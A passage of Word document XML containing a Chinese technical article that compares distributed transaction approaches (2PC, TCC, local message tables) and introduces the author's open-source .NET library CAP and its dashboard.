        <w:t>每个应用都可以根据自身的业务特点，采用适当的方式来使系统达到最终一致性</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>（Eventual consistency）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>有了以上理论之后，我们来看一下分布式事务的问题。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="43"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分布式事务</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:t>在分布式系统中，要实现分布式事务，无外乎那几种解决方案。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="288" w:after="115"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>一、两阶段提交（2PC）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:t>和上一节中提到的数据库XA事务一样，两阶段提交就是使用XA协议的原理，我们可以从下面这个图的流程来很容易的看出中间的一些比如commit和abort的细节。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="115" w:beforeAutospacing="0" w:after="115" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3601720" cy="2088515"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="37" name="图片 4" descr="https://images2017.cnblogs.com/blog/250417/201710/250417-20171016132145537-970496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descr="https://images2017.cnblogs.com/blog/250417/201710/250417-20171016132145537-970496141.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId41" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3601821" cy="2088570"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:t>两阶段提交这种解决方案属于牺牲了一部分可用性来换取的一致性。在实现方面，在 .NET 中，可以借助 TransactionScop 提供的 API 来编程实现分布式系统中的两阶段提交，比如WCF中就有实现这部分功能。不过在多服务器之间，需要依赖于DTC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>Distributed Transaction Coordinator</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:t>来完成事务一致性，Windows下微软搞的有MSDTC服务，Linux下就比较悲剧了。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:t>另外说一句，TransactionScop 默认不能用于异步方法之间事务一致，因为事务上下文是存储于当前线程中的，所以如果是在异步方法，需要显式的传递事务上下文。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="19"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>优点</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="19"/>
          <w:b w:val="0"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> 尽量保证了数据的强一致，适合对数据强一致要求很高的关键领域。（其实也不能100%保证强一致）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="19"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>缺点</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="19"/>
          <w:b w:val="0"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> 实现复杂，牺牲了可用性，对性能影响较大，不适合高并发高性能场景，如果分布式系统跨接口调用，目前 .NET 界还没有实现方案。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="288" w:after="115"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>二、补偿事务（TCC）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:t>TCC 其实就是采用的补偿机制，其核心思想是：针对每个操作，都要注册一个与其对应的确认和补偿（撤销）操作。它分为三个阶段：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="163"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Try 阶段主要是对业务系统做检测及资源预留</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="163"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Confirm 阶段主要是对业务系统做确认提交，Try阶段执行成功并开始执行 Confirm阶段时，默认 Confirm阶段是不会出错的。即：只要Try成功，Confirm一定成功。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="163"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Cancel 阶段主要是在业务执行错误，需要回滚的状态下执行的业务取消，预留资源释放。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:t>举个例子，假入 Bob 要向 Smith 转账，思路大概是：</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>我们有一个本地方法，里面依次调用</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>1、首先在 Try 阶段，要先调用远程接口把 Smith 和 Bob 的钱给冻结起来。</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>2、在 Confirm 阶段，执行远程调用的转账的操作，转账成功进行解冻。</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>3、如果第2步执行成功，那么转账成功，如果第二步执行失败，则调用远程冻结接口对应的解冻方法 (Cancel)。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="19"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>优点</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="19"/>
          <w:b w:val="0"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> 跟2PC比起来，实现以及流程相对简单了一些，但数据的一致性比2PC也要差一些</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="19"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>缺点</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="19"/>
          <w:b w:val="0"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> 缺点还是比较明显的，在2,3步中都有可能失败。TCC属于应用层的一种补偿方式，所以需要程序员在实现的时候多写很多补偿的代码，在一些场景中，一些业务流程可能用TCC不太好定义及处理。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="288" w:after="115"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>三、本地消息表（异步确保）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:t>本地消息表这种实现方式应该是业界使用最多的，其核心思想是将分布式事务拆分成本地事务进行处理，这种思路是来源于ebay。我们可以从下面的流程图中看出其中的一些细节：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="115" w:beforeAutospacing="0" w:after="115" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5713095" cy="2640965"/>
            <wp:effectExtent l="19050" t="0" r="1905" b="0"/>
            <wp:docPr id="38" name="图片 6" descr="https://images2017.cnblogs.com/blog/250417/201710/250417-20171016141237443-2074834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https://images2017.cnblogs.com/blog/250417/201710/250417-20171016141237443-2074834323.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId42" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5713095" cy="2640965"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:t>基本思路就是：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:t>消息生产方，需要额外建一个消息表，并记录消息发送状态。消息表和业务数据要在一个事务里提交，也就是说他们要在一个数据库里面。然后消息会经过MQ发送到消息的消费方。如果消息发送失败，会进行重试发送。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:t>消息消费方，需要处理这个消息，并完成自己的业务逻辑。此时如果本地事务处理成功，表明已经处理成功了，如果处理失败，那么就会重试执行。如果是业务上面的失败，可以给生产方发送一个业务补偿消息，通知生产方进行回滚等操作。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:t>生产方和消费方定时扫描本地消息表，把还没处理完成的消息或者失败的消息再发送一遍。如果有靠谱的自动对账补账逻辑，这种方案还是非常实用的。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:t>这种方案遵循BASE理论，采用的是最终一致性，笔者认为是这几种方案里面比较适合实际业务场景的，即不会出现像2PC那样复杂的实现(当调用链很长的时候，2PC的可用性是非常低的)，也不会像TCC那样可能出现确认或者回滚不了的情况。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="19"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>优点</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="19"/>
          <w:b w:val="0"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> 一种非常经典的实现，避免了分布式事务，实现了最终一致性。在 .NET中 有现成的解决方案。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="19"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>缺点</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="19"/>
          <w:b w:val="0"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> 消息表会耦合到业务系统中，如果没有封装好的解决方案，会有很多杂活需要处理。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:t>在 .NET 领域，似乎没有什么现成的关于分布式事务的解决方案，或者说是有但未开源。具笔者了解，有一些公司内部其实是有这种解决方案的，但是也是作为公司的一个核心产品之一，并未开源...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:t>鉴于以上原因，所以博主就打算自己写一个并且开源出来，所以从17年初就开始做这个事情，然后花了大半年的时间在一直不断完善，就是下面这个 CAP。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:beforeAutospacing="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Github </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://github.com/dotnetcore/CAP" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="21759B"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>CAP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="21759B"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>：这里的 CAP 就不是 CAP 理论了，而是一个 .NET 分布式事务解决方案的名字。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:beforeAutospacing="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>详细介绍：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "http://www.cnblogs.com/savorboard/p/cap.html" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="21759B"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>http://www.cnblogs.com/savorboard/p/cap.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="21759B"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>相关文档：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "http://www.cnblogs.com/savorboard/p/cap-document.html" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="21759B"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>http://www.cnblogs.com/savorboard/p/cap-document.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="21759B"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="115" w:beforeAutospacing="0" w:after="115" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>夸张的是，这个解决方案是具有可视化界面（Dashboard）的，你可以很方面的看到哪些消息执行成功，哪些消息执行失败，到底是发送失败还是处理失败，一眼便知。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:beforeAutospacing="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>最夸张的是，这个解决方案的可视化界面还提供了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="19"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>实时动态图表</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>，这样不但可以看到实时的消息发送及处理情况，连当前的系统处理消息的速度都可以看到，还可以看到过去24小时内的历史消息吞吐量。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="115" w:beforeAutospacing="0" w:after="115" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>最最夸张的是，这个解决方案的还帮你集成了 Consul 做分布式节点发现和注册还有心跳检查，你随时可以看到其他的节点的状况。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="115" w:beforeAutospacing="0" w:after="115" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>最最最夸张的是，你以为你看其他节点的数据要登录到其他节点的Dashboard控制台看？错了，你随便打开其中任意一个节点的Dashboard，点一下就可以切换到你想看的节点的控制台界面了，就像你看本地的数据一样，他们是完全去中心化的。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="115" w:beforeAutospacing="0" w:after="115" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
